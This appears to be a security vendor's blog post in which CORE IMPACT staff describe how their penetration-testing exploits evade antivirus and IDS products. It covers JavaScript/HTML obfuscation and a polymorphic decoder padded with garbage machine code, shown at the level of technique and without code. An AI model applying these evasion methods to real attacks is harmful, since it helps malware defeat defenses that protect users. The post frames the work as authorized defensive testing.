A common question I get asked by customers and non-customers alike is about how our products can help them assess the effectiveness of their defensive products and measure the amount of additional security that these investments offer. In a lot of environments patches or fixes cannot be applied (either at all or in a timely manner), so a compensating control (an Antivirus or some kind of IDS/IPS) is deployed instead to reduce or eliminate the threat the vulnerability presents to the business.

When you consider our solutions and those defensive technologies, you really have two products directly opposed to each other. Our products are designed and engineered to allow you to test your environments and defenses using real-world attack techniques; those products are intended to stop real world attacks from gain any foothold in the environment. What does this mean? In reality it means if one of our exploits is successful, half of our customers are ringing the creators of their defensive products complaining that they didn’t stop the exploit, and when an exploit fails, half our customers are calling us complaining that the exploit didn’t evade the defensive product. We end up in a cat and mouse game – I would say race but that implies a finish line, and I don’t see any sign of that.

It is an intellectually fun and exciting game – the reality is that evading these defenses is hard, and even when you do it doesn’t mean you are finished. When we implement a feature that evades AVs or IDS/IPS-type products and release it to our customers, we don’t break out the champagne and reassign the folks that devised the evasion – instead we monitor the defensive products to determine how they react to the change and design triggers/techniques to mitigate those changes – and then the whole dance starts again.

In order to better highlight the different types of work that we do around Exploit Effectiveness (our way of describing the desire for exploits to beat the defenses trying to stop them) I asked Core Security developer Alejandro David Weil to describe a sample of the work he has been doing recently. I think you will agree that it is an interesting insight into the various methods available to enable our exploits to avoid detection and help our customers better measure the effectiveness of the defenses they have invested in.

- Alex Horan, CORE IMPACT Product Manager

 

The Many Faces of Exploit Effectiveness - by CORE IMPACT developer Alejandro David Weil

A few months ago, the Core Security Exploit Effectiveness team started digging deeper into the evasion techniques that we build into our products. This is a really broad topic, and it would be impossible to comprehensively cover our evasion capabilities in one post. Exploit effectiveness applies to almost every penetration testing feature we offer, and when building our products we frequently tackle a number of considerations, such as:

  • choosing the best connection method
  • defining an exploit selection order
  • generating less-suspicious network traffic

However, antivirus and IDS evasion consistently rise above the rest, since it is their job to “catch” attackers.

Well, our job at Core Security is to help you test your organization against real-world attacks. We’re therefore constantly looking for ways to circumvent defensive technologies and demonstrate how attackers can still take advantage of vulnerabilities – with or without the latest AV or IDS in place. Surprisingly (or maybe not), it's still possible to skip protections using some well-known techniques.

Case Study: Client-Side Evasion

We recently took a CORE IMPACT client-side exploit for a vulnerability in a Microsoft ActiveX control and ran it against a vulnerable machine replicated with nine of the most popular antivirus solutions. This relatively standard attack was only detected by two of the AVs. Although we expected the exploit to be flagged by more than two solutions, those two stops proved that we had still work to do.

Solution A: HTML Obfuscation

The first antivirus that blocked the exploit is, in my opinion, the best-known antivirus software on the market. It detected exactly the vulnerability the exploit was designed to target. Since the AV knew what we were attacking, it might appear at first glance that there was little we could do – nonetheless, I began some tests to learn how exactly it detected the attack. However, a co-worker soon suggested that I simply obfuscate the HTML containing the vulnerable function used. That did the trick, so I never had to determine how the attack was detected; I just had to “cloak” it.

We created the obfuscation capability by recursively parsing HTML and javascript code, splitting it into chunks, and re-coding it randomly with specific javascript functions several times over. The encoding functions provide, among other things, symbols and strings compression and translation to randomly defined character sets.

Solution B: The Mutable Decoder

Solving the next evasion challenge was a little more complex, so bear with me here – it’s interesting.

We recently had been working on a machine-code encoder to evade string matching, which is a technique commonly used by virus writers since the dawn of AV. The first thing a lot of virus writers do is encrypt the code with different keys and/or algorithms to make it impossible to get a substring-based pattern of them. While this approach seems ok at first glance, the problem remains in that the virus has to include code to decrypt the malicious code – so you need to include decrypting code, but you can’t always use the same code (again, to avoid fingerprinting). Since the mutated decoder code has to be generated from the virus code itself, so defensive solution vendors can take one instance of the virus, analyze it, and make it generate its different decoders – ultimately aiding in their string matching efforts.

We therefore took the approach of generating different variations of decoders when our exploits request them. Also, since we generate decoders from PYTHON, we can perform more complex code generation that if we can do the same in assembler. This approach effectively mutates the decoder routine and therefore enhances the exploit’s overall effectiveness.

The Mutable Decoder supports the inlineegg code generation library we use to make code eggs. In designing the Decoder, we followed several criteria including:

  • the routine had to be made of instructions and higher-level blocks of code for that could generate and automatically switch to different versions
  • there could be no fixed byte in any position
  • it had to employ deterministic generation

As a result, we ended up with over a thousand different decoders in which we spread “garbage code,” which is composed of different machine instructions with restrictions that prevent them from negatively affecting the decoder. That gave us – are you ready for this? – 1,191,310,725,003,002,020 (about 1.19e+18) garbage codes. Mixed through decoder routines, these convert to more than 1.19e+21 different codes. AND we still can generate decoder code in a deterministic way that lets us test them all before release. Needless to say, this makes it much harder for defensive solutions to make a string-based match.

“But what about AV sandboxing and behavioral analysis?” you ask?

It’s true that the Mutable Decoder was made with IDS/IPS/HIPS software evasion in mind, because its focus was to make it harder to get a string-match. We didn’t think it would be effective with antivirus, since AV solutions typically use sandboxing/code emulation and behavioral analysis, which makes an encoder useless. Sandboxing and code emulation leave the suspicious or unexpected code naked and easily detectable after executing the decoding routine. Behavioral analysis is designed to detect the suspicious behavior while it's happening. However, these techniques require much more processing power and execution time – so, if the AV knows exactly what to look for and where to look, string matching is often sufficient.

However, we were wrong about our Mutable Decoder’s ability to evade AV. When we analyzed how the second antivirus solution detected our attack, we found it was triggered by a little fragment of code our exploits use to deploy an IMPACT agent. We then found that adding the Mutable Decoder to the triggering code was enough to skip the antivirus alert and safely install the Impact Agent!

What we learned

  • Even the vexing defensive challenges, which at first seem impossible for attackers (and penetration testers) to surmount, can be solved through creative research.
  • The deeper we dive into the subject of exploit effectiveness, the more improvement potential we reveal. For example, while making the Mutable Decoder, we discovered that we had to create the garbage egg to generate valid (but restricted) machine code to obfuscate and we realized it would be effective to generate padding and nopsled chunks
  • In client-side environments, antivirus runs under constraints analogous to those in malware detection – specifically, the deeper analysis they do, the longer it takes and the more it degrades performance.
  • Criminals are in a race with defensive solution vendors. So we have to be a race, too. Like attackers in the wild, we are continuously working to understand detection techniques and find ways to bypass them.
  • Old techniques can still come in handy!

- Alejandro David Weil, Developer